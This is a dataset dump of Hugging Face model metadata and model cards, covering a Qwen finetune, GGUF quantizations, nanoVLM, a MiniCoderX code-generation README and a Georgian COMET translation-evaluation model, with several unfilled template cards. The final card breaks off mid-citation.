modelId
stringlengths
5
139
author
stringlengths
2
42
last_modified
timestamp[us, tz=UTC]date
2020-02-15 11:33:14
2025-06-01 06:27:29
downloads
int64
0
223M
likes
int64
0
11.7k
library_name
stringclasses
461 values
tags
sequencelengths
1
4.05k
pipeline_tag
stringclasses
54 values
createdAt
timestamp[us, tz=UTC]date
2022-03-02 23:29:04
2025-06-01 06:27:15
card
stringlengths
11
1.01M
dougiefresh/jade_qwen3_4b_gguf
dougiefresh
2025-05-30T10:03:17Z
0
0
gguf
[ "gguf", "grammar", "logic", "rhetoric", "math", "programming", "aarch64", "c", "rust", "nushell", "text-generation", "en", "dataset:dougiefresh/grammar_logic_rhetoric_and_math", "dataset:dougiefresh/systems_programming_and_administration", "dataset:dougiefresh/systems_programming_code_conversations", "dataset:dougiefresh/jade_identity", "base_model:Qwen/Qwen3-4B", "base_model:quantized:Qwen/Qwen3-4B", "license:cc-by-nc-sa-4.0", "endpoints_compatible", "region:us", "conversational" ]
text-generation
2025-05-30T09:55:30Z
--- license: cc-by-nc-sa-4.0 datasets: - dougiefresh/grammar_logic_rhetoric_and_math - dougiefresh/systems_programming_and_administration - dougiefresh/systems_programming_code_conversations - dougiefresh/jade_identity language: - en base_model: - Qwen/Qwen3-4B tags: - grammar - logic - rhetoric - math - programming - aarch64 - c - rust - nushell - gguf library_name: gguf pipeline_tag: text-generation --- # Jade Qwen 3 4B - GGUF versions A systems progamming Qwen finetune. ![Jade](./Jade.jpeg) ## Model description Please view the model [description on the non-quantized version](https://huggingface.co/dougiefresh/jade_qwen3_4b).
hoan17/saving_P800s200x14d4_10
hoan17
2025-05-30T10:02:38Z
0
0
diffusers
[ "diffusers", "safetensors", "trl", "o2o", "reinforcement-learning", "text-to-image", "stable-diffusion", "license:apache-2.0", "autotrain_compatible", "endpoints_compatible", "diffusers:StableDiffusionPipeline", "region:us" ]
text-to-image
2025-05-30T10:01:37Z
--- license: apache-2.0 tags: - trl - o2o - diffusers - reinforcement-learning - text-to-image - stable-diffusion --- # TRL O2O Model This is a diffusion model that has been fine-tuned with reinforcement learning to guide the model outputs according to a value, function, or human feedback. The model can be used for image generation conditioned with text.
rziga/mm_grounding_dino_base_all
rziga
2025-05-30T10:01:09Z
0
0
transformers
[ "transformers", "safetensors", "mm-grounding-dino", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:59:35Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
mradermacher/Refact-1_6B-fim-GGUF
mradermacher
2025-05-30T09:59:43Z
35
0
transformers
[ "transformers", "gguf", "code", "en", "dataset:bigcode/the-stack-dedup", "dataset:rombodawg/2XUNCENSORED_MegaCodeTraining188k", "dataset:bigcode/commitpackft", "base_model:refactai/Refact-1_6B-fim", "base_model:quantized:refactai/Refact-1_6B-fim", "license:bigscience-openrail-m", "endpoints_compatible", "region:us" ]
null
2025-03-11T02:23:57Z
--- base_model: refactai/Refact-1_6B-fim datasets: - bigcode/the-stack-dedup - rombodawg/2XUNCENSORED_MegaCodeTraining188k - bigcode/commitpackft language: - en library_name: transformers license: bigscience-openrail-m quantized_by: mradermacher tags: - code --- ## About <!-- ### quantize_version: 2 --> <!-- ### output_tensor_quantised: 1 --> <!-- ### convert_type: hf --> <!-- ### vocab_type: --> <!-- ### tags: --> static quants of https://huggingface.co/refactai/Refact-1_6B-fim <!-- provided-files --> weighted/imatrix quants are available at https://huggingface.co/mradermacher/Refact-1_6B-fim-i1-GGUF ## Usage If you are unsure how to use GGUF files, refer to one of [TheBloke's READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for more details, including on how to concatenate multi-part files. ## Provided Quants (sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants) | Link | Type | Size/GB | Notes | |:-----|:-----|--------:|:------| | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q2_K.gguf) | Q2_K | 0.7 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_S.gguf) | Q3_K_S | 0.8 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q3_K_L.gguf) | Q3_K_L | 1.0 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.IQ4_XS.gguf) | IQ4_XS | 1.0 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_S.gguf) | Q5_K_S | 1.2 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q5_K_M.gguf) | Q5_K_M | 1.2 | | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q6_K.gguf) | Q6_K | 1.4 | very good quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.Q8_0.gguf) | Q8_0 | 1.8 | fast, best quality | | [GGUF](https://huggingface.co/mradermacher/Refact-1_6B-fim-GGUF/resolve/main/Refact-1_6B-fim.f16.gguf) | f16 | 3.3 | 16 bpw, overkill | Here is a handy graph by ikawrakow comparing some lower-quality quant types (lower is better): ![image.png](https://www.nethype.de/huggingface_embed/quantpplgraph.png) And here are Artefact2's thoughts on the matter: https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9 ## FAQ / Model Request See https://huggingface.co/mradermacher/model_requests for some answers to questions you might have and/or if you want some other model quantized. ## Thanks I thank my company, [nethype GmbH](https://www.nethype.de/), for letting me use its servers and providing upgrades to my workstation to enable this work in my free time. <!-- end -->
yfqiu-nlp/chameleon-world-model-aurora-bootstrap
yfqiu-nlp
2025-05-30T09:58:18Z
0
0
peft
[ "peft", "safetensors", "arxiv:1910.09700", "base_model:leloy/Anole-7b-v0.1-hf", "base_model:adapter:leloy/Anole-7b-v0.1-hf", "region:us" ]
null
2025-05-30T09:55:36Z
--- base_model: leloy/Anole-7b-v0.1-hf library_name: peft --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed] ### Framework versions - PEFT 0.13.0
leobianco/npov_RM_google_S_130104_LLM_false_STRUCT_false_epochs_3_lr_1e-3_r_8_2505300948
leobianco
2025-05-30T09:54:12Z
0
0
transformers
[ "transformers", "safetensors", "arxiv:1910.09700", "endpoints_compatible", "region:us" ]
null
2025-05-30T09:48:56Z
--- library_name: transformers tags: [] --- # Model Card for Model ID <!-- Provide a quick summary of what the model is/does. --> ## Model Details ### Model Description <!-- Provide a longer summary of what this model is. --> This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated. - **Developed by:** [More Information Needed] - **Funded by [optional]:** [More Information Needed] - **Shared by [optional]:** [More Information Needed] - **Model type:** [More Information Needed] - **Language(s) (NLP):** [More Information Needed] - **License:** [More Information Needed] - **Finetuned from model [optional]:** [More Information Needed] ### Model Sources [optional] <!-- Provide the basic links for the model. --> - **Repository:** [More Information Needed] - **Paper [optional]:** [More Information Needed] - **Demo [optional]:** [More Information Needed] ## Uses <!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. --> ### Direct Use <!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. --> [More Information Needed] ### Downstream Use [optional] <!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app --> [More Information Needed] ### Out-of-Scope Use <!-- This section addresses misuse, malicious use, and uses that the model will not work well for. --> [More Information Needed] ## Bias, Risks, and Limitations <!-- This section is meant to convey both technical and sociotechnical limitations. --> [More Information Needed] ### Recommendations <!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. --> Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations. ## How to Get Started with the Model Use the code below to get started with the model. [More Information Needed] ## Training Details ### Training Data <!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. --> [More Information Needed] ### Training Procedure <!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. --> #### Preprocessing [optional] [More Information Needed] #### Training Hyperparameters - **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision --> #### Speeds, Sizes, Times [optional] <!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. --> [More Information Needed] ## Evaluation <!-- This section describes the evaluation protocols and provides the results. --> ### Testing Data, Factors & Metrics #### Testing Data <!-- This should link to a Dataset Card if possible. --> [More Information Needed] #### Factors <!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. --> [More Information Needed] #### Metrics <!-- These are the evaluation metrics being used, ideally with a description of why. --> [More Information Needed] ### Results [More Information Needed] #### Summary ## Model Examination [optional] <!-- Relevant interpretability work for the model goes here --> [More Information Needed] ## Environmental Impact <!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly --> Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700). - **Hardware Type:** [More Information Needed] - **Hours used:** [More Information Needed] - **Cloud Provider:** [More Information Needed] - **Compute Region:** [More Information Needed] - **Carbon Emitted:** [More Information Needed] ## Technical Specifications [optional] ### Model Architecture and Objective [More Information Needed] ### Compute Infrastructure [More Information Needed] #### Hardware [More Information Needed] #### Software [More Information Needed] ## Citation [optional] <!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. --> **BibTeX:** [More Information Needed] **APA:** [More Information Needed] ## Glossary [optional] <!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. --> [More Information Needed] ## More Information [optional] [More Information Needed] ## Model Card Authors [optional] [More Information Needed] ## Model Card Contact [More Information Needed]
rhinocamp/nanoVLM
rhinocamp
2025-05-30T09:53:23Z
1
0
nanovlm
[ "nanovlm", "safetensors", "vision-language", "multimodal", "research", "image-text-to-text", "license:mit", "region:us" ]
image-text-to-text
2025-05-27T22:02:47Z
--- # For reference on model card metadata, see the spec: https://github.com/huggingface/hub-docs/blob/main/modelcard.md?plain=1 # Doc / guide: https://huggingface.co/docs/hub/model-cards library_name: nanovlm license: mit pipeline_tag: image-text-to-text tags: - vision-language - multimodal - research --- **nanoVLM** is a minimal and lightweight Vision-Language Model (VLM) designed for efficient training and experimentation. Built using pure PyTorch, the entire model architecture and training logic fits within ~750 lines of code. It combines a ViT-based image encoder (SigLIP-B/16-224-85M) with a lightweight causal language model (SmolLM2-135M), resulting in a compact 222M parameter model. For more information, check out the base model on https://huggingface.co/lusxvr/nanoVLM-222M. **Usage:** Clone the nanoVLM repository: https://github.com/huggingface/nanoVLM. Follow the install instructions and run the following code: ```python from models.vision_language_model import VisionLanguageModel model = VisionLanguageModel.from_pretrained("rhinocamp/nanoVLM") ```
kuuroo/zipee
kuuroo
2025-05-30T09:52:04Z
0
0
null
[ "license:apache-2.0", "region:us" ]
null
2025-05-29T11:51:05Z
--- license: apache-2.0 ---
sanjudebnath/MiniCoderX
sanjudebnath
2025-05-30T09:51:04Z
0
0
null
[ "safetensors", "code-generation", "transformer", "ast", "cfg", "langchain", "ollama", "text-generation", "en", "dataset:the-stack", "dataset:codesearchnet", "dataset:humaneval", "dataset:mbpp", "dataset:bugs2fix", "dataset:java-python", "license:mit", "region:us" ]
text-generation
2025-04-20T15:56:01Z
--- language: - en license: mit tags: - code-generation - transformer - ast - cfg - langchain - ollama model_name: MiniCoderX datasets: - the-stack - codesearchnet - humaneval - mbpp - bugs2fix - java-python pipeline_tag: text-generation --- # 🚀 MiniCoderX: A Lightweight Transformer for Code Generation **MiniCoderX** is a structure-aware, transformer-based small language model (SLM) for code generation. It blends modern architectural techniques with efficient deployment using tools like **LangChain** and **Ollama**, making it ideal for rapid local experimentation. Link -> https://v0-mini-coder-x.vercel.app/ --- ## ✨ Features - 🧠 Transformer-based encoder-decoder (TinyCodeT5 / DistilGPT2) - 🌲 AST/CFG-aware encoding for code structure understanding - 💾 Syntax-constrained decoding using grammar rules and trees - 🔁 Multi-task heads: generation, summarization, translation, bug fixing - ⚙️ LangChain + Ollama integration for fast local deployment - 🧪 Evaluated on HumanEval, CodeXGLUE, MBPP --- ## 🏗️ Model Architecture | Component | Description | |----------------|-----------------------------------------------------------| | Base | Tiny encoder-decoder (MiniLM, DistilGPT2, TinyCodeT5) | | Structure-aware | AST and Control Flow Graph embeddings + positional masks | | Heads | Multi-task heads for flexible downstream use | | Decoder | Syntax-aware beam search (grammar constraints) | | Tokenizer | BPE or SentencePiece trained on code + comments | --- ## 🔧 Architectural Additions (SOTA Techniques) ### 🌲 AST/CFG Embeddings Enhances understanding of code structure by: - Adding AST node/edge embeddings to token inputs - Including path embeddings between syntactic elements - Graph-aware position encoding Inspired by: **StructCoder**, **AST-T5**, **Code4Struct** ### 💾 Syntax-Constrained Decoding Improves generation accuracy and reduces invalid code by: - Restricting token outputs using grammar constraints (BNF/PEG) - Custom decoding logic (e.g., Tree traversal) - Dynamic decoding masks based on token state Inspired by: **TreeGen**, **Code4Struct** ### 🔁 Multi-Task Learning Heads Supports multiple tasks: - Code generation (NL → Code) - Summarization (Code → NL) - Translation (Java ⇄ Python) - Code repair and completion Inspired by: **CodeT5+**, **CoTexT** --- ## ⚡ LangChain + Ollama Integration ### 💡 Why? To enable: - 🧪 Local testing and chaining of models via **LangChain** - 🦮 Fast prototyping with **Ollama** for custom transformer backends - 🔄 Easy switch between small local models and larger remote APIs ### 🔌 Integration Plan ```python from langchain.llms import Ollama from langchain.chains import LLMChain from langchain.prompts import PromptTemplate # Load MiniCoderX with Ollama llm = Ollama(model="minicoderx") # Local model via Ollama # Define code generation prompt prompt = PromptTemplate( input_variables=["instruction"], template="Generate Python code for the task: {instruction}", ) chain = LLMChain(llm=llm, prompt=prompt) result = chain.run("Sort a list of integers using quicksort") print(result) ``` > ✅ Ollama will be used to serve your fine-tuned SLM locally > ✅ LangChain will wrap it with prompts, chains, and memory features for interactivity --- ## 📦 Datasets | Dataset | Use | |----------------|----------------------------| | The Stack (subset) | Pretraining corpus | | CodeSearchNet | Summarization, Search | | HumanEval | Code generation benchmark | | MBPP | Python programming prompts | | Bugs2Fix | Code repair | | Java-Python | Cross-language translation | --- ## 🔬 Training Objectives - ✅ Span Masking (CodeT5-style) - ✅ Contrastive pretraining - ✅ Instruction tuning (natural prompt formatting) - ✅ Auto-regressive generation --- ## 📊 Evaluation Benchmarks | Benchmark | Metric | |------------|-------------------| | HumanEval | Pass@1, BLEU | | MBPP | Accuracy | | CodeXGLUE | CodeBLEU, EM | | Unit Tests | Pass Rate | --- ## 🧪 Project Roadmap ### ✅ Phase 1: MVP Model - Train TinyCodeT5 model with span masking - Evaluate on MBPP and HumanEval-lite - Serve via Ollama + LangChain prompt chain ### 🔁 Phase 2: Structural Learning - Add AST/CFG encodings - Introduce grammar-constrained decoding - Multi-task training (gen, sum, repair) ### 📦 Phase 3: Optimization & Packaging - Distill from larger model (e.g., StarCoder) - Add reinforcement fine-tuning via test cases - Export to Hugging Face + Ollama integration --- ## 🛠️ Tools & Frameworks - [Hugging Face Transformers](https://github.com/huggingface/transformers) - [LangChain](https://github.com/langchain-ai/langchain) - [Ollama](https://ollama.com/) - SentencePiece / BPE - NetworkX for AST/CFG parsing --- ## 🤝 Contributing Want to help with grammar decoders, AST integration, or evaluation? PRs welcome! --- ## 📜 License MIT License. Built for research and open experimentation. --- ## 📧 Contact Drop an issue or discussion on GitHub!
Darsala/georgian_comet
Darsala
2025-05-30T09:50:30Z
0
0
comet
[ "comet", "translation", "evaluation", "mt-evaluation", "georgian", "ka", "en", "dataset:Darsala/georgian_metric_evaluation", "base_model:Unbabel/wmt22-comet-da", "base_model:finetune:Unbabel/wmt22-comet-da", "license:apache-2.0", "model-index", "region:us" ]
translation
2025-05-29T13:46:03Z
--- language: - ka - en license: apache-2.0 tags: - translation - evaluation - comet - mt-evaluation - georgian metrics: - kendall_tau - spearman_correlation - pearson_correlation model-index: - name: Georgian-COMET results: - task: type: translation-evaluation name: Machine Translation Evaluation dataset: name: Georgian MT Evaluation Dataset type: Darsala/georgian_metric_evaluation metrics: - type: pearson_correlation value: 0.878 name: Pearson Correlation - type: spearman_correlation value: 0.796 name: Spearman Correlation - type: kendall_tau value: 0.603 name: Kendall's Tau base_model: Unbabel/wmt22-comet-da datasets: - Darsala/georgian_metric_evaluation --- # Georgian-COMET: Fine-tuned COMET for English-Georgian MT Evaluation This is a [COMET](https://github.com/Unbabel/COMET) evaluation model fine-tuned specifically for English-Georgian machine translation evaluation. It receives a triplet with (source sentence, translation, reference translation) and returns a score that reflects the quality of the translation compared to both source and reference. ## Model Description Georgian-COMET is a fine-tuned version of [Unbabel/wmt22-comet-da](https://huggingface.co/Unbabel/wmt22-comet-da) that has been optimized for evaluating English-to-Georgian translations through knowledge distillation from Claude Sonnet 4. The model shows significant improvements over the base model when evaluating Georgian translations. ### Key Improvements over Base Model | Metric | Base COMET | Georgian-COMET | Improvement | |--------|------------|----------------|-------------| | Pearson | 0.867 | **0.878** | +1.1% | | Spearman | 0.759 | **0.796** | +3.7% | | Kendall | 0.564 | **0.603** | +3.9% | ## Paper - **Base Model Paper**: [COMET-22: Unbabel-IST 2022 Submission for the Metrics Shared Task](https://aclanthology.org/2022.wmt-1.52) (Rei et al., WMT 2022) - **This Model**: Paper coming soon ## Repository [https://github.com/LukaDarsalia/nmt_metrics_research](https://github.com/LukaDarsalia/nmt_metrics_research) ## License Apache-2.0 ## Usage (unbabel-comet) Using this model requires unbabel-comet to be installed: ```bash pip install --upgrade pip # ensures that pip is current pip install unbabel-comet ``` ### Option 1: Direct Download from HuggingFace ```python from comet import load_from_checkpoint import requests import os # Download the model checkpoint model_url = "https://huggingface.co/Darsala/georgian_comet/resolve/main/model.ckpt" model_path = "georgian_comet.ckpt" # Download if not already present if not os.path.exists(model_path): response = requests.get(model_url) with open(model_path, 'wb') as f: f.write(response.content) # Load the model model = load_from_checkpoint(model_path) # Prepare your data data = [ { "src": "The cat sat on the mat.", "mt": "კატა ზის ხალიჩაზე.", "ref": "კატა იჯდა ხალიჩაზე." }, { "src": "Schools and kindergartens were opened.", "mt": "სკოლები და საბავშვო ბაღები გაიხსნა.", "ref": "გაიხსნა სკოლები და საბავშვო ბაღები." } ] # Get predictions model_output = model.predict(data, batch_size=8, gpus=1) print(model_output) ``` ### Option 2: Using comet CLI First download the model checkpoint: ```bash wget https://huggingface.co/Darsala/georgian_comet/resolve/main/model.ckpt -O georgian_comet.ckpt ``` Then use it with comet CLI: ```bash comet-score -s {source-inputs}.txt -t {translation-outputs}.txt -r {references}.txt --model georgian_comet.ckpt ``` ### Option 3: Integration with Evaluation Pipeline ```python from comet import load_from_checkpoint import pandas as pd # Load model model = load_from_checkpoint("georgian_comet.ckpt") # Load your evaluation data df = pd.read_csv("your_evaluation_data.csv") # Prepare data in COMET format data = [ { "src": row["sourceText"], "mt": row["targetText"], "ref": row["referenceText"] } for _, row in df.iterrows() ] # Get scores scores = model.predict(data, batch_size=16) print(f"Average score: {sum(scores['scores']) / len(scores['scores']):.3f}") ``` ## Intended Uses This model is intended to be used for **English-Georgian MT evaluation**. Given a triplet with (source sentence in English, translation in Georgian, reference translation in Georgian), it outputs a single score between 0 and 1 where 1 represents a perfect translation. ### Primary Use Cases 1. **MT System Development**: Evaluate and compare different English-Georgian MT systems 2. **Quality Assurance**: Automated quality checks for Georgian translations 3. **Research**: Study MT evaluation for morphologically rich languages like Georgian 4. **Production Monitoring**: Track translation quality in production environments ### Out-of-Scope Use - **Other Language Pairs**: This model is specifically fine-tuned for English-Georgian and may not perform well on other language pairs - **Reference-Free Evaluation**: The model requires reference translations - **Document-Level**: Optimized for sentence-level evaluation ## Training Details ### Training Data - **Dataset**: 5,000 English-Georgian pairs from [corp.dict.ge](https://corp.dict.ge/) - **MT Systems**: Translations from SMaLL-100, Google Translate, and Ucraft Translate - **Scoring Method**: Knowledge distillation from Claude Sonnet 4 with added Gaussian noise (σ=3) - **Details**: See [Darsala/georgian_metric_evaluation](https://huggingface.co/datasets/Darsala/georgian_metric_evaluation) ### Training Configuration ```yaml regression_metric: init_args: nr_frozen_epochs: 0.3 keep_embeddings_frozen: True optimizer: AdamW encoder_learning_rate: 1.5e-05 learning_rate: 1.5e-05 loss: mse dropout: 0.1 batch_size: 8 ``` ### Training Procedure 1. **Base Model**: Started from Unbabel/wmt22-comet-da checkpoint 2. **Knowledge Distillation**: Used Claude Sonnet 4 scores as training targets 3. **Robustness**: Added Gaussian noise to training scores to prevent overfitting 4. **Optimization**: 8 epochs with early stopping (patience=4) on validation Kendall's tau ## Evaluation Results ### Test Set Performance Evaluated on 400 human-annotated English-Georgian translation pairs: | Metric | Score | p-value | |--------|-------|---------| | Pearson | 0.878 | < 0.001 | | Spearman | 0.796 | < 0.001 | | Kendall | 0.603 | < 0.001 | ### Comparison with Other Metrics | Metric | Pearson | Spearman | Kendall | |--------|---------|----------|---------| | **Georgian-COMET** | **0.878** | 0.796 | 0.603 | | Base COMET | 0.867 | 0.759 | 0.564 | | LLM-Reference-Based | 0.852 | **0.798** | **0.660** | | CHRF++ | 0.739 | 0.690 | 0.498 | | TER | 0.466 | 0.443 | 0.311 | | BLEU | 0.413 | 0.497 | 0.344 | ## Languages Covered While the base model (XLM-R) covers 100+ languages, this fine-tuned version is specifically optimized for: - **Source Language**: English (en) - **Target Language**: Georgian (ka) For other language pairs, we recommend using the base [Unbabel/wmt22-comet-da](https://huggingface.co/Unbabel/wmt22-comet-da) model. ## Limitations 1. **Language Specific**: Optimized only for English→Georgian evaluation 2. **Domain**: Training data primarily from corp.dict.ge (general/literary domain) 3. **Reference Required**: Cannot perform reference-free evaluation 4. **Sentence Level**: Not optimized for document-level evaluation ## Citation If you use this model, please cite: ```bibtex @misc{georgian-comet-2025, title={Georgian-COMET: Fine-tuned COMET for English-Georgian MT Evaluation}, author={Luka Darsalia, Ketevan Bakhturidze, Saba Sturua}, year={2025}, publisher={HuggingFace}, url={https://huggingface.co/Darsala/georgian_comet} } @inproceedings{rei-etal-2022-comet, title = "{COMET}-22: Unbabel-{IST} 2022 Submission for the Metrics Shared Task", author = "Rei, Ricardo and C. de Souza, Jos{\'e} G. and Alves, Duarte and Zerva, Chrysoula and Farinha, Ana C 